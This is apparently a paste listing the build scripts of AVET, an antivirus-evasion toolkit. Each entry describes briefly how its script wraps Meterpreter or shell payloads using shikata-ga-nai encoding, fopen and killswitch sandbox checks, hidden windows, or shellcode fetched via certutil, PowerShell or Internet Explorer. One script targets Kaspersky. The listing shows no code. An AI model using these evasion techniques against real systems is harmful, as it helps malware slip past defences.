Build scripts of Avet

TVT618 Jan 28th, 2019 1,663 Never
buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh
Service example for win32.

build_win32_meterpreter_rev_https_50xshikata_quiet.sh
In this example the evasion technique is simple. The shellcode is encoded with 20 rounds of
shikata-ga-nai, which is often enough to do the trick (note: now it might be more ;) ). This
technique is pretty similar to a junk loop: execute so much code that the AV engine breaks off
execution and lets the file pass. Here in quiet mode, the window is hidden.

build_win32_meterpreter_rev_https_50xshikata.sh
See previous, window not hidden.

build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh
It is possible to load shellcode as a parameter from cmd like:
C:\> pwn.exe <shellcode>

build_win32_meterpreter_rev_https_ASCIIMSF.sh

build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh
AV evasion with the fopen technique, hidden window.

build_win32_meterpreter_rev_https_fopen_shikata.sh
See previous example.

build_win32_meterpreter_rev_https_killswitch_shikata.sh
AV evasion with the killswitch technique.

build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh
Download shellcode with the certutil.exe command and execute it.

build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh
Like build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh, but also builds the
payload with DKMC, a tool by https://github.com/mrun1k0d3r.
For more: https://govolution.wordpress.com/2018/03/02/download-exec-poc-and-dkmc/

build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh
This one downloads shellcode from a webserver into memory and executes it.

build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh
Download shellcode with a PowerShell command and execute it.

build_win32_meterpreter_rev_https_shikata_fopen.sh
Sandbox evasion with fopen and additional encoding.

build_win32_meterpreter_rev_https_shikata_loadfile.sh
Loads and executes shellcode from a given file; needs AVET's encoding.

build_win32_meterpreter_rev_https_shikata_load_ie.sh
This is a bit tricky and might not work on the first shot. The executable will start Internet Explorer and download the ASCII-encoded shellcode. The shellcode is then read from the cache directory and, if found, executed. This was tested with Windows 7 only.

build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
Same as before with debug output.

build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh
Example for loading raw shellcode files.

build_win32_meterpreter_unstaged_rev_https_40xshikata.sh
Unstaged payload with DLLs included. For more see https://govolution.wordpress.com/2017/05/06/avet-and-unstaged-payloads/

build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
Build this one for Kaspersky, don't know if it is still unrecognized.

build_win64_meterpreter_rev_tcp_xor_downloadexecshellcode.sh
This one downloads shellcode from a webserver into memory and executes it.

build_win64_meterpreter_rev_tcp_xor_fopen.sh
64-bit executable with fopen evasion.

build_win64_meterpreter_rev_tcp_xor.sh
64-bit executable.